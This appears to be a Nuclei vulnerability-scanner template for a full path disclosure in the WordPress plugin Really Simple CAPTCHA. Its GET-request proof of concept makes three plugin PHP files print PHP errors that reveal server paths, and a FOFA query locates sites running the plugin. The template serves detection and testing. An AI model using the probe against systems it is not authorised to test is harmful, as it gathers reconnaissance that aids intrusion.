wp-really-simple-captcha-fpd: WordPress Plugin Really Simple CAPTCHA - Full Path Disclosure

Description

WordPress Plugin Really Simple CAPTCHA was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.

PoC

id: wp-really-simple-captcha-fpd

info:
  name: WordPress Plugin Really Simple CAPTCHA - Full Path Disclosure
  author: pussycat0x
  severity: low
  description: |
     WordPress Plugin Really Simple CAPTCHA was detected to be vulnerable to Full Path Disclosure, allowing unauthenticated attackers to obtain the full application path that could aid other attacks when combined with another vulnerability.
  reference:
    - https://wordpress.org/plugins/really-simple-captcha/
  metadata:
    max-request: 3
    verified: false
    fofa-query: body="wp-content/plugins/really-simple-captcha/"
  tags: wordpress,wp,wp-plugin,fpd,wp-really-simple-captcha,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/really-simple-captcha.php"
      - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/includes/filesystem.php"
      - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/uninstall.php"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "Fatal error", "Uncaught Error:") || contains_all(body, "Warning:", "failed to open stream")'
          - 'status_code == 200 || status_code == 500'
          - 'contains(body, "really-simple-captcha")'
        condition: and
# digest: 4a0a00473045022100de1c1c7795c4ec71295df6c35c2acea75cc64ba7bd946ebf25a630cda2c6ab7b022017bd388b5e9f480574bd2f0db9ed14d28de74575522c8a9b9f02b1aa0c895db9:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities